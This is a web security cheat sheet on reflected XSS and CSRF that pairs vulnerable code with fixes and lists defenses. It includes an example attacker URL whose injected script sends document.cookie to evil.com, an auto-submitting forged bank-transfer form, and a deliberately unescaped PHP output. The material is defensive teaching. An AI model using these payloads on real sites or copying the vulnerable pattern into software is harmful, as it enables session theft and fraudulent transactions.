Web Security Basics (XSS/CSRF) Cheat Sheet
Covers cross-site scripting and cross-site request forgery attacks with concrete examples and the defenses that stop them.
2 PagesIntermediateMar 18, 2026
Reflected XSS Example & Fix
An unescaped output vulnerability and three ways to fix it.
html
<!-- VULNERABLE: user input rendered without escaping --><div>Welcome, <?php echo $_GET['name']; ?></div><!-- Attacker URL: ?name=<script>fetch('https://evil.com?c='+document.cookie)</script> --><!-- FIX 1: HTML-escape output --><div>Welcome, <?php echo htmlspecialchars($_GET['name'], ENT_QUOTES, 'UTF-8'); ?></div><!-- FIX 2: Content-Security-Policy header blocks inline script execution --><!-- Content-Security-Policy: default-src 'self'; script-src 'self' --><!-- FIX 3: In React/Vue, avoid dangerouslySetInnerHTML / v-html with untrusted input -->
CSRF Attack & Token Defense
An auto-submitting cross-site form and the token that stops it.
html
<!-- Attacker's page auto-submits a form to your bank while the user is logged in --><form action="https://bank.com/transfer" method="POST" id="csrf"> <input type="hidden" name="to" value="attacker-account"> <input type="hidden" name="amount" value="10000"></form><script>document.getElementById('csrf').submit();</script><!-- DEFENSE: server includes a per-session CSRF token the attacker can't guess --><form action="/transfer" method="POST"> <input type="hidden" name="csrf_token" value="{{ csrfToken }}"> ...</form><!-- Server rejects the request unless the submitted token matches the session's token -->
XSS Defense Techniques
Layered mitigations against script injection.
- Output encoding- Escape user data based on context (HTML, attribute, JS, URL) before rendering
- Content-Security-Policy- CSP header restricts which scripts/styles can execute, blocking inline injections
- Input validation- Whitelist expected formats server-side; never trust client-side validation alone
- HttpOnly cookies- Prevents document.cookie from exposing session cookies to injected scripts
- Sanitize rich text- Use a library like DOMPurify when you must render user-supplied HTML
- Avoid innerHTML/eval- Use textContent or framework-safe binding with untrusted data instead
CSRF Defense Techniques
Ways to stop forged cross-site requests.
- Synchronizer token pattern- Unique, unpredictable token embedded in forms and verified per request
- SameSite cookies- Set-Cookie: SameSite=Lax or Strict blocks cookies on cross-site requests
- Double-submit cookie- Token sent both as a cookie and a header/body field; server compares them
- Custom request headers- Requiring X-Requested-With on AJAX calls, which cross-origin forms can't set
- Re-authentication- Require password/2FA confirmation for high-value actions like changing email
Pro Tip
SameSite=Lax cookies (the modern browser default) block most CSRF on top-level navigation, but they don't stop it on same-site subdomains or non-GET requests triggered another way — still implement CSRF tokens on any endpoint that mutates data.
Was this cheat sheet helpful?
Explore Topics
#WebSecurityBasicsXSSCSRF#WebSecurityBasicsXSSCSRFCheatSheet#WebDevelopment#Intermediate#Reflected#XSS#Example#Fix#Security#CommandLine#CheatSheet#SkillVeris
Advertisement
Sri Hayavadhana Info-Tech
Professional Web Designing Services
- Responsive Websites
- E-commerce Solutions
- SEO Friendly Design
- Fast & Secure
- Support & Maintenance